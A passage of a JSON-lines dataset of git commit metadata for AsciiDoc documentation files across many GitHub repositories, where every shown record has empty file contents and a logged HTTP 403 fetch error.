nilabhsagar\/elasticsearch,scottsom\/elasticsearch,uschindler\/elasticsearch,alexshadow007\/elasticsearch,sneivandt\/elasticsearch,wenpos\/elasticsearch,s1monw\/elasticsearch,masaruh\/elasticsearch,mohit\/elasticsearch,geidies\/elasticsearch,glefloch\/elasticsearch,nezirus\/elasticsearch,sneivandt\/elasticsearch,rlugojr\/elasticsearch,obourgain\/elasticsearch,markwalkom\/elasticsearch,HonzaKral\/elasticsearch,scottsom\/elasticsearch,sneivandt\/elasticsearch,LeoYao\/elasticsearch,mortonsykes\/elasticsearch,obourgain\/elasticsearch,a2lin\/elasticsearch,fernandozhu\/elasticsearch,glefloch\/elasticsearch,rlugojr\/elasticsearch,shreejay\/elasticsearch,StefanGor\/elasticsearch,fernandozhu\/elasticsearch,coding0011\/elasticsearch,njlawton\/elasticsearch,nezirus\/elasticsearch,naveenhooda2000\/elasticsearch,robin13\/elasticsearch,JSCooke\/elasticsearch,strapdata\/elassandra,naveenhooda2000\/elasticsearch,vroyer\/elasticassandra,bawse\/elasticsearch,jimczi\/elasticsearch,nezirus\/elasticsearch,mortonsykes\/elasticsearch,a2lin\/elasticsearch,nazarewk\/elasticsearch,Shepard1212\/elasticsearch,gingerwizard\/elasticsearch,maddin2016\/elasticsearch,elasticdog\/elasticsearch,nknize\/elasticsearch,lks21c\/elasticsearch,winstonewert\/elasticsearch,C-Bish\/elasticsearch,HonzaKral\/elasticsearch,alexshadow007\/elasticsearch,wenpos\/elasticsearch,jimczi\/elasticsearch,jprante\/elasticsearch,geid
ies\/elasticsearch,JackyMai\/elasticsearch,vroyer\/elassandra,IanvsPoplicola\/elasticsearch,gingerwizard\/elasticsearch,Shepard1212\/elasticsearch,robin13\/elasticsearch,MisterAndersen\/elasticsearch,rajanm\/elasticsearch,lks21c\/elasticsearch,winstonewert\/elasticsearch,ZTE-PaaS\/elasticsearch,markwalkom\/elasticsearch,lks21c\/elasticsearch,wangtuo\/elasticsearch,Helen-Zhao\/elasticsearch,masaruh\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,C-Bish\/elasticsearch,LewayneNaidoo\/elasticsearch,glefloch\/elasticsearch,Stacey-Gammon\/elasticsearch,scottsom\/elasticsearch,nilabhsagar\/elasticsearch,mortonsykes\/elasticsearch,wangtuo\/elasticsearch,i-am-Nathan\/elasticsearch,nazarewk\/elasticsearch,mikemccand\/elasticsearch,Stacey-Gammon\/elasticsearch,winstonewert\/elasticsearch,strapdata\/elassandra,qwerty4030\/elasticsearch,geidies\/elasticsearch,fred84\/elasticsearch,MisterAndersen\/elasticsearch,gfyoung\/elasticsearch,JackyMai\/elasticsearch,wangtuo\/elasticsearch,glefloch\/elasticsearch,brandonkearby\/elasticsearch,Stacey-Gammon\/elasticsearch,fred84\/elasticsearch","old_file":"docs\/reference\/docs\/update-by-query.asciidoc","new_file":"docs\/reference\/docs\/update-by-query.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0e79ac78892368860332f0a3969a108e6687e9ab","subject":"more WiP","message":"more WiP\n","repos":"EMBL-EBI-SUBS\/subs,EMBL-EBI-SUBS\/subs","old_file":"subs-api\/src\/main\/resources\/docs\/how_to_submit_data_programatically.adoc","new_file":"subs-api\/src\/main\/resources\/docs\/how_to_submit_data_programatically.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMBL-EBI-SUBS\/subs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4ae37627752730812993e6d5bf435946343904d4","subject":"- Initial README","message":"- Initial README\n","repos":"semkr\/workshops,davidkirwan\/workshops,davidkirwan\/workshops,semkr\/workshops","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/davidkirwan\/workshops.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e1e8fc8f13dd8668fdcebb1c7e45cd057023ffd9","subject":"Change VersionEye badge style.","message":"Change VersionEye badge style.\n","repos":"ryotan\/kaba-vault,ryotan\/kaba-vault","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ryotan\/kaba-vault.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4f782f37bc03f68c71ac3456c787b15b164a56c0","subject":"Update 2016-03-13-c-c.adoc","message":"Update 2016-03-13-c-c.adoc","repos":"chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io","old_file":"_posts\/2016-03-13-c-c.adoc","new_file":"_posts\/2016-03-13-c-c.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chbailly\/chbailly.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"edd30e7010d9c36bb22f25c35f06381caa20c85d","subject":"Update 2017-12-23-First-Anniversary.adoc","message":"Update 2017-12-23-First-Anniversary.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-12-23-First-Anniversary.adoc","new_file":"_posts\/2017-12-23-First-Anniversary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f5f7714b2d05e3f277a3e48f47f39b6674e435d3","subject":"Update 2016-02-19-Friday-Favorites-What-is-your-favorite-Disney-queue.adoc","message":"Update 2016-02-19-Friday-Favorites-What-is-your-favorite-Disney-queue.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-19-Friday-Favorites-What-is-your-favorite-Disney-queue.adoc","new_file":"_posts\/2016-02-19-Friday-Favorites-What-is-your-favorite-Disney-queue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c65368ec2813a5a1dba30772fb2357c10978801","subject":"Create AUTHORS.adoc","message":"Create AUTHORS.adoc","repos":"GYMY-16\/gymybook,GYMY-16\/gymybook","old_file":"AUTHORS.adoc","new_file":"AUTHORS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GYMY-16\/gymybook.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b016be1b1f6a74e77c07827a353168f720f29852","subject":"add guide index page","message":"add guide index page\n","repos":"clojure\/clojure-site","old_file":"content\/guides\/guides.adoc","new_file":"content\/guides\/guides.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"ca6834c38995a9c289201d35d7ad7ff178d3268b","subject":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","message":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f0cbafc928628e8f4a49bde955363208850d4f3","subject":"y2b create post The Smartphone Battery Life World Champion - 10,000mAh!","message":"y2b create post The Smartphone Battery Life World Champion - 
10,000mAh!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-09-The-Smartphone-Battery-Life-World-Champion--10000mAh.adoc","new_file":"_posts\/2017-11-09-The-Smartphone-Battery-Life-World-Champion--10000mAh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"99652d730a54759218a0dd75a14816e1c34aeec3","subject":"doc\/release notes v2.28","message":"doc\/release notes v2.28\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"doc\/release_notes.asciidoc","new_file":"doc\/release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"744074668c36cb20873e0ab8ad80df314c4cdd35","subject":"build instructions","message":"build instructions\n","repos":"HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j","old_file":"enterprise\/README.asciidoc","new_file":"enterprise\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HuangLS\/neo4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"19bcb02a1b08edb0e55a5b66dad47808c9cd51b7","subject":"Update 2016-02-04-Second-Post.adoc","message":"Update 2016-02-04-Second-Post.adoc","repos":"Kif11\/Kif11.github.io,Kif11\/Kif11.github.io,Kif11\/Kif11.github.io,Kif11\/Kif11.github.io","old_file":"_posts\/2016-02-04-Second-Post.adoc","new_file":"_posts\/2016-02-04-Second-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Kif11\/Kif11.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f7048821e2bd2d1964460910c5c69888ed926f7","subject":"Update 2016-04-10-tcpip-stack.adoc","message":"Update 2016-04-10-tcpip-stack.adoc","repos":"dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io","old_file":"_posts\/2016-04-10-tcpip-stack.adoc","new_file":"_posts\/2016-04-10-tcpip-stack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dingboopt\/dingboopt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d7cba35f2d04cbe2d69e7aa4e75bfd49d94ffc3","subject":"deref","message":"deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/06\/18\/deref.adoc","new_file":"content\/news\/2021\/06\/18\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"de27b48759f3bc40b8e83891c5de5388342f577f","subject":"Adding missing archive folder.","message":"Adding missing archive 
folder.","repos":"bharavi\/jPOS,barspi\/jPOS,jpos\/jPOS,jpos\/jPOS,bharavi\/jPOS,jpos\/jPOS,bharavi\/jPOS,yinheli\/jPOS,barspi\/jPOS,alcarraz\/jPOS,alcarraz\/jPOS,barspi\/jPOS,yinheli\/jPOS,alcarraz\/jPOS,yinheli\/jPOS","old_file":"doc\/src\/asciidoc\/ch03\/dirpoll.adoc","new_file":"doc\/src\/asciidoc\/ch03\/dirpoll.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jpos\/jPOS.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"28da40c73b8628711c018cb946ece354712f914b","subject":"Python note: Generating a random base64 string","message":"Python note: Generating a random base64 string\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"a9744279bd0b7c0b75bed50594d92903d8f6a8b8","subject":"symlinked README","message":"symlinked README\n","repos":"eworm-de\/yubikey-personalization-gui,eworm-de\/yubikey-personalization-gui,Yubico\/yubikey-personalization-gui,Yubico\/yubikey-personalization-gui,eworm-de\/yubikey-personalization-gui,Yubico\/yubikey-personalization-gui","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eworm-de\/yubikey-personalization-gui.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"51d294f190b647bf308ac18389d1b191ab378ecc","subject":"Add README file","message":"Add README file\n","repos":"cytrinox\/cxxc","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cytrinox\/cxxc.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f4528b587632927a99224964e56a3822b4f1bb8","subject":"initial commit","message":"initial commit\n","repos":"spring-cloud\/spring-cloud-stream,garyrussell\/spring-cloud-stream,garyrussell\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,garyrussell\/spring-cloud-stream,spring-cloud\/spring-cloud-stream","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/garyrussell\/spring-cloud-stream.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"39cea86dfa2d615854a05b146d08e329087dab03","subject":"Create README.adoc","message":"Create README.adoc","repos":"millross\/millross-vertx-servo,millross\/millross-vertx-servo","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/millross\/millross-vertx-servo.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3ea73b05daa6b9d470e3f904fea8dcb6cf71ae8","subject":"Update readme","message":"Update readme\n","repos":"mdenchev\/mui","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdenchev\/mui.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"12d94fe578a0186fcd579f3fc42c54cb7ea4644d","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84fb6e284981ee037c97ab54005bbe99c22ded4c","subject":"Add contributor covenant","message":"Add contributor covenant\n\nWe're big enough that we should have a contributor code of conduct. It's better to have this in place before something happens.\r\n\r\nThis is a direct lift from spring. We may want to adjust the reporting email address to be something riff specific down the road, but should be good enough for now.","repos":"markfisher\/sk8s,markfisher\/sk8s,markfisher\/sk8s,markfisher\/sk8s","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markfisher\/sk8s.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0828a4759ace30d29170c0d56050e4686809c7fc","subject":"Bitcoin Network configuration documentation","message":"Bitcoin Network configuration documentation\n","repos":"fvasquezjatar\/fermat-unused,fvasquezjatar\/fermat-unused","old_file":"fermat-documentation\/technical notes\/Bitcoin configuration\/Local bitcoin environment.asciidoc","new_file":"fermat-documentation\/technical notes\/Bitcoin configuration\/Local bitcoin environment.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fvasquezjatar\/fermat-unused.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dbdb44a69aeaecc17ab88a743d8271d21d032717","subject":"Publish 2016-11-14.adoc","message":"Publish 2016-11-14.adoc","repos":"zhuo2015\/zhuo2015.github.io,zhuo2015\/zhuo2015.github.io,zhuo2015\/zhuo2015.github.io,zhuo2015\/zhuo2015.github.io","old_file":"2016-11-14.adoc","new_file":"2016-11-14.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zhuo2015\/zhuo2015.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc7d46add62ddf73cb8c90d74d390901cfc297a7","subject":"Update 2015-06-10-Web-Development-Learning.adoc","message":"Update 2015-06-10-Web-Development-Learning.adoc","repos":"jsonify\/jsonify.github.io,jsonify\/jsonify.github.io,jsonify\/jsonify.github.io","old_file":"_posts\/2015-06-10-Web-Development-Learning.adoc","new_file":"_posts\/2015-06-10-Web-Development-Learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsonify\/jsonify.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b23b161114f65d73f361582834a1f786483f241b","subject":"Update 2016-05-04-Wordpress-Settings-A-P-I.adoc","message":"Update 
2016-05-04-Wordpress-Settings-A-P-I.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-05-04-Wordpress-Settings-A-P-I.adoc","new_file":"_posts\/2016-05-04-Wordpress-Settings-A-P-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a62ff6ae19c8e27a2f37903248e941596560f6f","subject":"Delete the file at '_posts\/2016-09-13-Encrypted-Hetzner-Server.adoc'","message":"Delete the file at '_posts\/2016-09-13-Encrypted-Hetzner-Server.adoc'","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2016-09-13-Encrypted-Hetzner-Server.adoc","new_file":"_posts\/2016-09-13-Encrypted-Hetzner-Server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7de7b2f2da5232f76b35ac63f1d74b104e333772","subject":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","message":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07d8f4a10e3d2070a3e6ddd3c3d49e4f8fae89a0","subject":"Update 2015-01-31-RK.adoc","message":"Update 2015-01-31-RK.adoc","repos":"simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon","old_file":"_posts\/2015-01-31-RK.adoc","new_file":"_posts\/2015-01-31-RK.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simonturesson\/hubpresstestsimon.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"719b204a621388b8e58c6c5b0e2159b9712fac37","subject":"initial README","message":"initial README\n","repos":"philandstuff\/fizzgig","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/philandstuff\/fizzgig.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12fdb06ee44d497f7438cbbde7a68805cc358f04","subject":"Start README.asciidoc","message":"Start README.asciidoc\n","repos":"rmuhamedgaliev\/JPS,rmuhamedgaliev\/JPS","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/JPS.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e48b19264a088a07692559fd16ea54fea38256c7","subject":"Update 
2016-03-22-Fat-buster-successful-Hacking-Health-Camp-2016.adoc","message":"Update 2016-03-22-Fat-buster-successful-Hacking-Health-Camp-2016.adoc","repos":"fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog","old_file":"_posts\/2016-03-22-Fat-buster-successful-Hacking-Health-Camp-2016.adoc","new_file":"_posts\/2016-03-22-Fat-buster-successful-Hacking-Health-Camp-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fw4spl-org\/fw4spl-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"115a2c08d9cfd2729267e3dde8b05347fbb8c4cb","subject":"Update 2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","message":"Update 2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","new_file":"_posts\/2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52d293a9898e8d70bc8551327d938c1aa16df1ed","subject":"Publish 2016-6-27-PHP.adoc","message":"Publish 2016-6-27-PHP.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-27-PHP.adoc","new_file":"2016-6-27-PHP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d00d03073ad48b5444c4099f94a29fc1c160594","subject":"changed bracing","message":"changed bracing\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week06.asciidoc","new_file":"asciidoc\/week06.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"23aee2343f2631045a0004e76c6d2d97a2c0bfee","subject":"Renamed batch_runtime_lifecycle","message":"Renamed batch_runtime_lifecycle\n","repos":"WASdev\/standards.jsr352.batch-spec,WASdev\/standards.jsr352.batch-spec","old_file":"specification\/job_runtime_lifecycle.adoc","new_file":"specification\/job_runtime_lifecycle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/WASdev\/standards.jsr352.batch-spec.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"84ba901da32cbbd2a7639b5d5c98953262be3713","subject":"Update 2016-12-14-IEEE-Day-Story-IEEE-THDC-IHET-SB.adoc","message":"Update 2016-12-14-IEEE-Day-Story-IEEE-THDC-IHET-SB.adoc","repos":"IEEECompute\/blog,IEEECompute\/blog,IEEECompute\/blog,IEEECompute\/blog","old_file":"_posts\/2016-12-14-IEEE-Day-Story-IEEE-THDC-IHET-SB.adoc","new_file":"_posts\/2016-12-14-IEEE-Day-Story-IEEE-THDC-IHET-SB.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IEEECompute\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"f87864a95fb7e44a24311a66ebc08ed0d67f0c07","subject":"Update 2018-04-01-Why-did-you-do-that.adoc","message":"Update 2018-04-01-Why-did-you-do-that.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b977bd2a6df6ea23315752b4ab47c7f1efee2d9","subject":"Provide basic GraphQL query examples","message":"Provide basic GraphQL query examples\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"707f6d61ef8892b1c021550b547e339065febfef","subject":"Add missing annotation","message":"Add missing annotation\n","repos":"InfoSec812\/vertx-sql-common,InfoSec812\/vertx-sql-common,InfoSec812\/vertx-sql-common","old_file":"src\/main\/asciidoc\/enums.adoc","new_file":"src\/main\/asciidoc\/enums.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InfoSec812\/vertx-sql-common.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f17c53532367575769471343ef329712d4c798b3","subject":"Update 2018-02-05-.adoc","message":"Update 2018-02-05-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-05-.adoc","new_file":"_posts\/2018-02-05-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4606e870a557d34a7952cf3bee25eb04ed70a162","subject":"Add docs\/README","message":"Add docs\/README\n","repos":"meisterluk\/screenshot-compare","old_file":"docs\/README.adoc","new_file":"docs\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/meisterluk\/screenshot-compare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db6a873b4053432b37fb1e45a75c147831ace33d","subject":"Update alerts standalone installation doc","message":"Update alerts standalone installation 
doc\n","repos":"hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/alerts\/index.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/alerts\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1b8ac555e25322ea0631962574ae365c330d0257","subject":"Delete README-zh.adoc","message":"Delete 